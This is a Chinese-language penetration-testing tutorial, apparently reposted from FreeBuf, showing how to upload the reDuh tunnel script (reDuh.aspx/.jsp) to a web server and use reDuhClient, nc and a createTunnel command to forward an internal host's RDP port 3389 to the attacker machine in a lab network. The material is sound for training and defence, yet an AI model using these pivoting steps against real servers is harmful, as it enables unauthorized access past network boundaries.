reDuh搭建HTTP正向代理
reDuh是Glenn Wilkinson在2008年美國黑客大會上演示的一款正向代理工具,該工具實現了HTTP代理功能。
實驗環境 | 系統 | IP地址 |
---|---|---|
DC | Windows Server 2012 R2 | 10.10.10.10(Host-Only模式) |
WEB服務器 | Windows Server 2008 R2 | 10.10.10.80(Host-Only模式) / 192.168.111.80(Host-Only模式) |
攻擊機 | Windows 10 | 192.168.111.11(Host-Only模式) |
本實驗主要模擬滲透測試中外網主機通過代理主機訪問內網服務器的場景。
DC(10.10.10.10)處於內網(10.10.10.0/24)環境中,僅允許內網主機遠程連接。我們要在代理主機(10.10.10.80)上搭建HTTP正向代理,實現攻擊主機遠程登錄內網服務器。
驗證未開啓reDuh代理前,攻擊機與DC網絡不通,遠程連接127.0.0.1:1234失敗。
WEB服務器可直接遠程連接DC。
將reDuh.aspx程序部署到跳板主機網站根目錄,訪問頁面結果如下:
在攻擊主機上連接跳板主機上的reDuh.aspx文件,執行命令如下:
java -jar reDuhClient.jar http://192.168.111.80/reDuh.aspx
使用nc.exe監聽本機1010端口,對正向代理進行管理。
在正向代理管理命令行中,通過
[createTunnel]local_port:remote_host:remote_port
命令創建遠程主機remote_host:remote_port端口到本機local_port端口的映射,執行命令如下:
[createTunnel]1234:10.10.10.10:3389
執行命令後可在reDuh客戶端看到成功建立連接:
此時遠程訪問中輸入127.0.0.1:1234即可實現對10.10.10.10主機的遠程訪問:
使用 ReDuh 構造合法的 HTTP 請求以建立 TCP 通道
注: ReDuh 是一個通過 HTTP 協議建立隧道傳輸各種其他數據的工具。其可以把內網服務器的端口通過 http/https 隧道轉發到本機,形成一個連通迴路。用於目標服務器在內網或做了端口策略的情況下連接目標服務器內部開放端口。
對了親~ReDuh-Gui 號稱端口轉發神器哦。
https://github.com/sensepost/reDuh
步驟 1
上傳 reDuh.jsp 目標服務器
$ http://192.168.10.50/uploads/reDuh.jsp
步驟 2
在本機運行 reDuhClient
$ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
步驟 3
使用 nc 連接管理端口
$ nc -nvv 127.0.0.1 1010
步驟 4
使用隧道轉發本地端口到遠程目標端口
[createTunnel] 7777:172.16.0.4:3389
步驟 5
使用 RDP 連接遠程
$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777
轉自:https://www.freebuf.com/sectool/105524.html